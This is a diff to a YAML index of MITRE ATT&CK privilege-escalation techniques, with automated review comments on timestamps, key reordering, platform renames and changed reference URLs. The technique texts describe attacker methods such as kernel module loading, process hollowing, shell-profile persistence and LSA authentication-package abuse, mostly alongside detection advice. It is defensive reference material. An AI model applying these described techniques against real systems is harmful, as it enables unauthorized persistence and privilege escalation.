- Adversaries may run commands on the target system before loading a malicious module in order to ensure that it is properly compiled. (Citation: iDefense Rootkit Overview) Adversaries may also execute commands to identify the exact version of the running Linux kernel and/or download multiple versions of the same .ko (kernel object) files to use the one appropriate for the running system.(Citation: Trend Micro Skidmap) Many LKMs require Linux headers (specific to the target kernel) in order to compile properly. These are typically obtained through the operating systems package manager and installed like a normal package. On Ubuntu and Debian based systems this can be accomplished by running: apt-get install linux-headers-$(uname -r)
On RHEL and CentOS based systems this can be accomplished by running: yum install kernel-devel-$(uname -r)
-
- On macOS, monitor for execution of kextload
commands and user installed kernel extensions performing abnormal and/or potentially malicious activity (such as creating network connections). Monitor for new rows added in the kext_policy
table. KextPolicy stores a list of user approved (non Apple) kernel extensions and a partial history of loaded kernel modules in a SQLite database, /var/db/SystemPolicyConfiguration/KextPolicy
.(Citation: User Approved Kernel Extension Pike’s)(Citation: Purves Kextpocalypse 2)(Citation: Apple Developer Configuration Profile)
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: persistence
- - kill_chain_name: mitre-attack
- phase_name: privilege-escalation
- x_mitre_is_subtechnique: true
- x_mitre_data_sources:
- - 'Command: Command Execution'
- - 'File: File Creation'
- - 'File: File Modification'
- - 'Kernel: Kernel Module Load'
- - 'Process: Process Creation'
- x_mitre_permissions_required:
- - root
- x_mitre_attack_spec_version: 2.1.0
+ url: https://en.wikipedia.org/wiki/Loadable_kernel_module#Linux
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.006
atomic_tests: []
T1574.013:
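Review bot: the `-` lines in this tail of the T1547.006 hunk drop `modified`, `created_by_ref`, `name`, `x_mitre_detection`, `kill_chain_phases`, `x_mitre_is_subtechnique`, `x_mitre_data_sources` and `x_mitre_permissions_required`, while the only `+` lines add a `url`, `object_marking_refs` and the `x_mitre_attack_spec_version` bump to 3.2.0. If these fields are re-emitted earlier in the same object by the generator's new key order, fine, but that cannot be confirmed from this hunk; in particular `kill_chain_phases` with `phase_name: privilege-escalation` is what places T1547.006 in this tactic's index, so a missing re-emit would silently drop the technique from the privilege-escalation view. Please confirm the regenerated object still carries `kill_chain_phases`, `x_mitre_detection` and a `modified` timestamp.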
@@ -20816,7 +21130,7 @@ privilege-escalation:
url: https://docs.microsoft.com/en-us/windows/win32/api/winternl/nf-winternl-ntqueryinformationprocess
description: Microsoft. (2021, November 23). NtQueryInformationProcess function
(winternl.h). Retrieved February 4, 2022.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-22T15:47:33.915Z'
name: KernelCallbackTable
description: |-
Adversaries may abuse the KernelCallbackTable
of a process to hijack its execution flow in order to run their own payloads.(Citation: Lazarus APT January 2022)(Citation: FinFisher exposed ) The KernelCallbackTable
can be found in the Process Environment Block (PEB) and is initialized to an array of graphic functions available to a GUI process once user32.dll
is loaded.(Citation: Windows Process Injection KernelCallbackTable)
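Review bot: `modified` for T1574.013 moves backward, from `2022-05-11T14:00:00.188Z` to `2022-03-22T15:47:33.915Z`; a regenerated index normally only advances this timestamp. The same backward move recurs for several objects later in the patch (T1068, T1134.005, T1548.004, T1547.002, T1546.015, T1574.009, T1037.005, T1037.003, T1546.010, T1543.001, T1055.009, T1134, T1055.005, T1547.007, T1574.002). Confirm the generator was pointed at the intended ATT&CK STIX release, or state in the commit message why these timestamps revert, so that consumers comparing `modified` across releases are not misled.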
@@ -20842,12 +21156,10 @@ privilege-escalation:
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Process: OS API Execution'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1053.006:
technique:
- modified: '2023-09-08T11:56:26.862Z'
+ modified: '2024-10-15T16:42:51.536Z'
name: 'Scheduled Task/Job: Systemd Timers'
description: |-
Adversaries may abuse systemd timers to perform task scheduling for initial or recurring execution of malicious code. Systemd timers are unit files with file extension .timer
that control services. Timers can be set to run on a calendar event or after a time span relative to a starting point. They can be used as an alternative to [Cron](https://attack.mitre.org/techniques/T1053/003) in Linux environments.(Citation: archlinux Systemd Timers Aug 2020) Systemd timers may be activated remotely via the systemctl
command line utility, which operates over [SSH](https://attack.mitre.org/techniques/T1021/004).(Citation: Systemd Remote Control)
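Review bot: the `-` lines drop `x_mitre_attack_spec_version: 2.1.0` from T1574.013 without a `+` replacement in this hunk, whereas other objects in the patch get `x_mitre_attack_spec_version: 3.2.0` re-added. The same removal without a visible replacement happens for T1134.005, T1037.003, T1055.009 and T1055.005 further down. Either ensure 3.2.0 is emitted elsewhere in each of those objects or confirm the field is intentionally absent, so tooling that reads the attack spec version does not see it vanish for just these techniques. Dropping `spec_version: '2.1'` is consistent with the rest of the patch.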
@@ -20925,9 +21237,8 @@ privilege-escalation:
url: http://man7.org/linux/man-pages/man1/systemd.1.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1053.006
atomic_tests: []
T1574:
@@ -20994,7 +21305,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1543.005:
technique:
@@ -21068,11 +21378,10 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1078:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T16:09:46.024Z'
name: Valid Accounts
description: |-
Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.(Citation: volexity_0day_sophos_FW) Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
@@ -21089,7 +21398,6 @@ privilege-escalation:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
- x_mitre_attack_spec_version: 3.1.0
x_mitre_contributors:
- Syed Ummar Farooqh, McAfee
- Prasad Somasamudram, McAfee
@@ -21099,7 +21407,7 @@ privilege-escalation:
- Netskope
- Mark Wee
- Praetorian
- - Goldstein Menachem
+ - Menachem Goldstein
x_mitre_deprecated: false
x_mitre_detection: |-
Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services.(Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
@@ -21108,19 +21416,17 @@ privilege-escalation:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- Network
- x_mitre_version: '2.6'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.7'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'User Account: User Account Authentication'
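Review bot: this hunk swaps the T1078 platform tags `Azure AD`, `Office 365` and `Google Workspace` for `Office Suite` and `Identity Provider` and bumps `x_mitre_version` from 2.6 to 2.7. Anything that filters or builds per-platform views from `x_mitre_platforms` needs to recognise the new names, otherwise T1078 silently disappears from the Google Workspace and Azure AD views; the per-platform outputs should be regenerated together with this index. The `x_mitre_modified_by_ref` removed here is re-added later in the patch (hunk `@@ -21168`), so that part is key reordering only.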
@@ -21168,11 +21474,12 @@ privilege-escalation:
url: https://technet.microsoft.com/en-us/library/dn487457.aspx
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1055.012:
technique:
- modified: '2023-08-11T21:37:00.009Z'
+ modified: '2024-09-12T15:11:45.602Z'
name: 'Process Injection: Process Hollowing'
description: "Adversaries may inject malicious code into suspended and hollowed
processes in order to evade process-based defenses. Process hollowing is a
@@ -21240,23 +21547,22 @@ privilege-escalation:
Retrieved December 7, 2017.'
url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
- source_name: Leitch Hollowing
- description: Leitch, J. (n.d.). Process Hollowing. Retrieved November 12,
- 2014.
- url: http://www.autosectools.com/process-hollowing.pdf
+ description: Leitch, J. (n.d.). Process Hollowing. Retrieved September 12,
+ 2024.
+ url: https://new.dc414.org/wp-content/uploads/2011/01/Process-Hollowing.pdf
- source_name: Mandiant Endpoint Evading 2019
description: 'Pena, E., Erikson, C. (2019, October 10). Staying Hidden on
the Endpoint: Evading Detection with Shellcode. Retrieved November 29, 2021.'
url: https://www.mandiant.com/resources/staying-hidden-on-the-endpoint-evading-detection-with-shellcode
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1055.012
atomic_tests: []
T1068:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2023-04-07T17:13:54.168Z'
name: Exploitation for Privilege Escalation
description: |-
Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
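Review bot: the `Leitch Hollowing` reference now points to a copy hosted at new.dc414.org instead of the original autosectools.com PDF, with the retrieval date updated to September 12, 2024. That is a third-party mirror rather than the publisher; if the original is gone, a web.archive.org snapshot of the original URL (as used for the bencane reference later in this patch) is the more durable and verifiable choice, and the mirror's provenance should at least be mentioned in the commit message. In the same hunk, `modified` for T1068 moves backward from 2023-10-31 to 2023-04-07, which is worth checking against the source release.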
@@ -21319,11 +21625,10 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1546:
technique:
- modified: '2024-03-01T15:49:15.588Z'
+ modified: '2024-10-15T15:57:00.731Z'
name: Event Triggered Execution
description: "Adversaries may establish persistence and/or elevate privileges
using system mechanisms that trigger execution based on specific events. Various
@@ -21376,8 +21681,8 @@ privilege-escalation:
- Windows
- SaaS
- IaaS
- - Office 365
- x_mitre_version: '1.3'
+ - Office Suite
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Module: Module Load'
- 'WMI: WMI Creation'
@@ -21425,78 +21730,11 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546
atomic_tests: []
T1546.004:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Robert Wilson
- - Tony Lambert, Red Canary
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--b63a34e8-0a61-4c97-a23b-bf8a2ed812e2
- type: attack-pattern
- created: '2020-01-24T14:13:45.936Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1546.004
- url: https://attack.mitre.org/techniques/T1546/004
- - source_name: intezer-kaiji-malware
- url: https://www.intezer.com/blog/research/kaiji-new-chinese-linux-malware-turning-to-golang/
- description: 'Paul Litvak. (2020, May 4). Kaiji: New Chinese Linux malware
- turning to Golang. Retrieved December 17, 2020.'
- - source_name: bencane blog bashrc
- url: https://bencane.com/2013/09/16/understanding-a-little-more-about-etcprofile-and-etcbashrc/
- description: Benjamin Cane. (2013, September 16). Understanding a little more
- about /etc/profile and /etc/bashrc. Retrieved February 25, 2021.
- - source_name: anomali-rocke-tactics
- url: https://www.anomali.com/blog/illicit-cryptomining-threat-actor-rocke-changes-tactics-now-more-difficult-to-detect
- description: Anomali Threat Research. (2019, October 15). Illicit Cryptomining
- Threat Actor Rocke Changes Tactics, Now More Difficult to Detect. Retrieved
- December 17, 2020.
- - source_name: Linux manual bash invocation
- url: https://wiki.archlinux.org/index.php/Bash#Invocation
- description: ArchWiki. (2021, January 19). Bash. Retrieved February 25, 2021.
- - source_name: Tsunami
- url: https://unit42.paloaltonetworks.com/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/
- description: Claud Xiao and Cong Zheng. (2017, April 6). New IoT/Linux Malware
- Targets DVRs, Forms Botnet. Retrieved December 17, 2020.
- - source_name: anomali-linux-rabbit
- url: https://www.anomali.com/blog/pulling-linux-rabbit-rabbot-malware-out-of-a-hat
- description: Anomali Threat Research. (2018, December 6). Pulling Linux Rabbit/Rabbot
- Malware Out of a Hat. Retrieved December 17, 2020.
- - source_name: Magento
- url: https://blog.sucuri.net/2018/05/shell-logins-as-a-magento-reinfection-vector.html
- description: Cesar Anjos. (2018, May 31). Shell Logins as a Magento Reinfection
- Vector. Retrieved December 17, 2020.
- - source_name: ScriptingOSX zsh
- url: https://scriptingosx.com/2019/06/moving-to-zsh-part-2-configuration-files/
- description: 'Armin Briegel. (2019, June 5). Moving to zsh, part 2: Configuration
- Files. Retrieved February 25, 2021.'
- - source_name: PersistentJXA_leopitt
- url: https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5
- description: Leo Pitt. (2020, August 6). Persistent JXA - A poor man's Powershell
- for macOS. Retrieved January 11, 2021.
- - source_name: code_persistence_zsh
- url: https://github.com/D00MFist/PersistentJXA/blob/master/BashProfilePersist.js
- description: Leo Pitt. (2020, November 11). Github - PersistentJXA/BashProfilePersist.js.
- Retrieved January 11, 2021.
- - source_name: macOS MS office sandbox escape
- url: https://cedowens.medium.com/macos-ms-office-sandbox-brain-dump-4509b5fed49a
- description: Cedric Owens. (2021, May 22). macOS MS Office Sandbox Brain Dump.
- Retrieved August 20, 2021.
- - source_name: ESF_filemonitor
- url: https://objective-see.com/blog/blog_0x48.html
- description: Patrick Wardle. (2019, September 17). Writing a File Monitor
- with Apple's Endpoint Security Framework. Retrieved December 17, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-09-25T15:02:24.143Z'
name: 'Event Triggered Execution: .bash_profile .bashrc and .shrc'
description: "Adversaries may establish persistence through executing malicious
commands triggered by a user’s shell. User [Unix Shell](https://attack.mitre.org/techniques/T1059/004)s
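Review bot: the `-` lines remove the whole front half of T1546.004 (`x_mitre_platforms`, `x_mitre_domains`, `x_mitre_contributors`, `object_marking_refs`, `id`, `type`, `created`, `created_by_ref` and all 13 `external_references`) while the only `+` line is the new `modified` timestamp. This is key reordering that makes the object unreviewable hunk by hunk; a reviewer has to reconcile these removals against the later hunks of the same object. If the generator can emit keys in a stable order (or the output is sorted before writing), this diff shrinks to the timestamp and the reference changes. Until then, the commit message should call out that T1546.004 is reordered, not truncated.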
@@ -21544,6 +21782,10 @@ privilege-escalation:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_contributors:
+ - Robert Wilson
+ - Tony Lambert, Red Canary
+ x_mitre_deprecated: false
x_mitre_detection: "While users may customize their shell profile files, there
are only certain types of commands that typically appear in these files. Monitor
for abnormal commands such as execution of unknown programs, opening network
@@ -21554,9 +21796,13 @@ privilege-escalation:
events monitoring these specific files.(Citation: ESF_filemonitor) \n\nFor
most Linux and macOS systems, a list of file paths for valid shell options
available on a system are located in the /etc/shells
file.\n"
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
x_mitre_version: '2.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Process: Process Creation'
- 'File: File Creation'
@@ -21565,8 +21811,67 @@ privilege-escalation:
x_mitre_permissions_required:
- User
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--b63a34e8-0a61-4c97-a23b-bf8a2ed812e2
+ created: '2020-01-24T14:13:45.936Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1546/004
+ external_id: T1546.004
+ - source_name: anomali-linux-rabbit
+ description: Anomali Threat Research. (2018, December 6). Pulling Linux Rabbit/Rabbot
+ Malware Out of a Hat. Retrieved December 17, 2020.
+ url: https://www.anomali.com/blog/pulling-linux-rabbit-rabbot-malware-out-of-a-hat
+ - source_name: anomali-rocke-tactics
+ description: Anomali Threat Research. (2019, October 15). Illicit Cryptomining
+ Threat Actor Rocke Changes Tactics, Now More Difficult to Detect. Retrieved
+ December 17, 2020.
+ url: https://www.anomali.com/blog/illicit-cryptomining-threat-actor-rocke-changes-tactics-now-more-difficult-to-detect
+ - source_name: Linux manual bash invocation
+ description: ArchWiki. (2021, January 19). Bash. Retrieved February 25, 2021.
+ url: https://wiki.archlinux.org/index.php/Bash#Invocation
+ - source_name: ScriptingOSX zsh
+ description: 'Armin Briegel. (2019, June 5). Moving to zsh, part 2: Configuration
+ Files. Retrieved February 25, 2021.'
+ url: https://scriptingosx.com/2019/06/moving-to-zsh-part-2-configuration-files/
+ - source_name: bencane blog bashrc
+ description: Benjamin Cane. (2013, September 16). Understanding a little more
+ about /etc/profile and /etc/bashrc. Retrieved September 25, 2024.
+ url: https://web.archive.org/web/20220316014323/http://bencane.com/2013/09/16/understanding-a-little-more-about-etcprofile-and-etcbashrc/
+ - source_name: macOS MS office sandbox escape
+ description: Cedric Owens. (2021, May 22). macOS MS Office Sandbox Brain Dump.
+ Retrieved August 20, 2021.
+ url: https://cedowens.medium.com/macos-ms-office-sandbox-brain-dump-4509b5fed49a
+ - source_name: Magento
+ description: Cesar Anjos. (2018, May 31). Shell Logins as a Magento Reinfection
+ Vector. Retrieved December 17, 2020.
+ url: https://blog.sucuri.net/2018/05/shell-logins-as-a-magento-reinfection-vector.html
+ - source_name: Tsunami
+ description: Claud Xiao and Cong Zheng. (2017, April 6). New IoT/Linux Malware
+ Targets DVRs, Forms Botnet. Retrieved December 17, 2020.
+ url: https://unit42.paloaltonetworks.com/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/
+ - source_name: PersistentJXA_leopitt
+ description: Leo Pitt. (2020, August 6). Persistent JXA - A poor man's Powershell
+ for macOS. Retrieved January 11, 2021.
+ url: https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5
+ - source_name: code_persistence_zsh
+ description: Leo Pitt. (2020, November 11). Github - PersistentJXA/BashProfilePersist.js.
+ Retrieved January 11, 2021.
+ url: https://github.com/D00MFist/PersistentJXA/blob/master/BashProfilePersist.js
+ - source_name: ESF_filemonitor
+ description: Patrick Wardle. (2019, September 17). Writing a File Monitor
+ with Apple's Endpoint Security Framework. Retrieved December 17, 2020.
+ url: https://objective-see.com/blog/blog_0x48.html
+ - source_name: intezer-kaiji-malware
+ description: 'Paul Litvak. (2020, May 4). Kaiji: New Chinese Linux malware
+ turning to Golang. Retrieved December 17, 2020.'
+ url: https://www.intezer.com/blog/research/kaiji-new-chinese-linux-malware-turning-to-golang/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1546.004
atomic_tests: []
T1134.005:
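Review bot: the re-emitted `external_references` for T1546.004 is complete (all 13 entries, `mitre-attack` included, reappear in a different order), and the one substantive change inside it is the `bencane blog bashrc` entry: its URL now points at a web.archive.org snapshot of the 2013 post and the retrieval date moves from February 25, 2021 to September 25, 2024. The hunk also adds `revoked: false`, raises `x_mitre_attack_spec_version` from 2.1.0 to 3.2.0 and drops `spec_version`. Since the archive swap changes the cited source, mention it explicitly in the commit message rather than leaving it buried in a reorder.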
@@ -21612,7 +21917,7 @@ privilege-escalation:
description: Microsoft. (n.d.). Using DsAddSidHistory. Retrieved November
30, 2017.
source_name: Microsoft DsAddSidHistory
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-02-09T15:49:58.414Z'
name: 'Access Token Manipulation: SID-History Injection'
description: |-
Adversaries may use SID-History Injection to escalate privileges and bypass access controls. The Windows security identifier (SID) is a unique value that identifies a user or group account. SIDs are used by Windows security in both security descriptors and access tokens. (Citation: Microsoft SID) An account can hold additional SIDs in the SID-History Active Directory attribute (Citation: Microsoft SID-History Attribute), allowing inter-operable account migration between domains (e.g., all values in SID-History are included in access tokens).
@@ -21637,13 +21942,11 @@ privilege-escalation:
x_mitre_permissions_required:
- Administrator
- SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1134.005
atomic_tests: []
T1548.004:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-10-19T16:35:18.492Z'
name: Elevated Execution with Prompt
description: "Adversaries may leverage the AuthorizationExecuteWithPrivileges
API to escalate privileges by prompting the user for credentials.(Citation:
@@ -21723,7 +22026,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1547.002:
technique:
@@ -21759,7 +22061,7 @@ privilege-escalation:
Adversaries may abuse authentication packages to execute DLLs when the system boots. Windows authentication package DLLs are loaded by the Local Security Authority (LSA) process at system start. They provide support for multiple logon processes and multiple security protocols to the operating system.(Citation: MSDN Authentication Packages)
Adversaries can use the autostart mechanism provided by LSA authentication packages for persistence by placing a reference to a binary in the Windows Registry location HKLM\SYSTEM\CurrentControlSet\Control\Lsa\
with the key value of "Authentication Packages"=<target binary>
. The binary will then be executed by the system when the authentication packages are loaded.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T16:29:36.291Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Authentication Package
x_mitre_detection: 'Monitor the Registry for changes to the LSA Registry keys.
@@ -21782,12 +22084,11 @@ privilege-escalation:
- Administrator
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.002
atomic_tests: []
T1546.015:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-21T12:34:29.402Z'
name: 'Event Triggered Execution: Component Object Model Hijacking'
description: "Adversaries may establish persistence by executing malicious content
triggered by hijacked references to Component Object Model (COM) objects.
@@ -21865,12 +22166,11 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.015
atomic_tests: []
T1574.009:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:35.788Z'
name: 'Hijack Execution Flow: Path Interception by Unquoted Path'
description: |-
Adversaries may execute their own malicious payloads by hijacking vulnerable file path references. Adversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.
@@ -21931,7 +22231,6 @@ privilege-escalation:
url: https://docs.microsoft.com/en-us/windows-hardware/drivers/install/hklm-system-currentcontrolset-services-registry-tree
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
identifier: T1574.009
atomic_tests: []
T1037.005:
@@ -21975,7 +22274,7 @@ privilege-escalation:
mechanism.(Citation: Methods of Mac Malware Persistence) Additionally, since
StartupItems run during the bootup phase of macOS, they will run as the elevated
root user."
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T16:43:21.560Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Boot or Logon Initialization Scripts: Startup Items'
x_mitre_detection: |-
@@ -21997,7 +22296,6 @@ privilege-escalation:
- Administrator
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1037.005
atomic_tests: []
T1078.002:
@@ -22078,7 +22376,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1037.003:
technique:
@@ -22101,7 +22398,7 @@ privilege-escalation:
description: Daniel Petri. (2009, January 8). Setting up a Logon Script through
Active Directory Users and Computers in Windows Server 2008. Retrieved November
15, 2019.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-24T23:45:25.625Z'
name: Network Logon Script
description: "Adversaries may use network logon scripts automatically executed
at logon initialization to establish persistence. Network logon scripts can
@@ -22131,12 +22428,10 @@ privilege-escalation:
- 'File: File Modification'
- 'Process: Process Creation'
- 'File: File Creation'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1546.010:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-21T12:33:45.568Z'
name: 'Event Triggered Execution: AppInit DLLs'
description: "Adversaries may establish persistence and/or elevate privileges
by executing malicious content triggered by AppInit DLLs loaded into processes.
@@ -22221,7 +22516,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.010
atomic_tests: []
T1546.002:
@@ -22286,7 +22580,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.002
atomic_tests: []
T1543.001:
@@ -22361,7 +22654,7 @@ privilege-escalation:
benign software. Launch Agents are created with user level privileges and
execute with user level permissions.(Citation: OSX Malware Detection)(Citation:
OceanLotus for OS X) "
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-21T16:13:00.598Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Create or Modify System Process: Launch Agent'
x_mitre_detection: "Monitor Launch Agent creation through additional plist files
@@ -22389,7 +22682,6 @@ privilege-escalation:
- User
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1543.001
atomic_tests: []
T1055.009:
@@ -22420,7 +22712,7 @@ privilege-escalation:
url: http://man7.org/linux/man-pages/man1/dd.1.html
description: Kerrisk, M. (2020, February 2). DD(1) User Commands. Retrieved
February 21, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-06-20T22:25:55.331Z'
name: Proc Memory
description: "Adversaries may inject malicious code into processes via the /proc
filesystem in order to evade process-based defenses as well as possibly elevate
@@ -22463,12 +22755,10 @@ privilege-escalation:
x_mitre_defense_bypassed:
- Application control
- Anti-virus
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1546.016:
technique:
- modified: '2024-04-12T02:23:44.583Z'
+ modified: '2024-04-28T15:52:44.332Z'
name: Installer Packages
description: |-
Adversaries may establish persistence and elevate privileges by using an installer to trigger the execution of malicious content. Installer packages are OS specific and contain the resources an operating system needs to install applications on a system. Installer packages can include scripts that run prior to installation as well as after installation is complete. Installer scripts may inherit elevated permissions when executed. Developers often use these scripts to prepare the environment for installation, check requirements, download dependencies, and remove files after installation.(Citation: Installer Package Scripting Rich Trouton)
@@ -22485,7 +22775,7 @@ privilege-escalation:
phase_name: persistence
x_mitre_contributors:
- Brandon Dalton @PartyD0lphin
- - Alexander Rodchenko
+ - Rodchenko Aleksandr
x_mitre_deprecated: false
